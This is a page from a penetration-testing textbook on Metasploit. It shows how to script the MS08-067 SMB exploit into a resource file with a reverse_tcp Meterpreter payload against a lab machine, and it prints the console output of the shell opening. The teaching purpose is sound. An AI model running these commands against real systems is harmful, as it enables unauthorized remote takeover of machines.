background image

The Joy of Exploitation

73

A more complex resource file might automatically run a particular exploit 

against a machine in your lab environment. For example, the following listing 
uses an SMB exploit in a newly created resource file called 

autoexploit.rc

. We 

set a payload and our attack and target IPs in this one file so that we don’t 
have to specify these options manually when attempting this exploit.

root@bt:/opt/framework3/msf3/ 

echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc

root@bt:/opt/framework3/msf3/ 

echo set RHOST 192.168.1.155 >> autoexploit.rc

root@bt:/opt/framework3/msf3/ 

echo set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc

root@bt:/opt/framework3/msf3/ 

echo set LHOST 192.168.1.101 >> autoexploit.rc

root@bt:/opt/framework3/msf3/ 

echo exploit >> autoexploit.rc

root@bt:/opt/framework3/msf3/ 

msfconsole

msf > 

resource autoexploit.rc

resource (autoexploit.rc) > use exploit/windows/smb/ms08_067_netapi
resource (autoexploit.rc)> set RHOST 192.168.1.155
RHOST => 192.168.1.155
resource (autoexploit.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (autoexploit.rc)> set LHOST 192.168.1.101
LHOST => 192.168.1.101
resource (autoexploit.rc)> exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering the vulnerability...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1033)

meterpreter >

Here we specify the resource file within 

msfconsole

, and it automatically 

runs our specified commands as shown by the output displayed at  .

NOTE

These are just a couple of simple examples. In Chapter 12, you will learn how to use 

karma

, a very large resource file.

Wrapping Up

You’ve just exploited your first machine and gained full access to it with 

msfconsole

. Congratulations! 

We began this chapter by covering the basics of exploitation and com-

promising a target based on a discovered vulnerability. Exploitation is about 
identifying a system’s potential exposures and exploiting its weaknesses. We 
used 

nmap

 to identify potentially vulnerable services. From there we launched 

an exploit that gave us access to a system. 

In the next chapter, we will explore Meterpreter in more detail as we 

learn how to use it in post exploitation. You will find Meterpreter to be an 
amazing tool once you’ve compromised a system.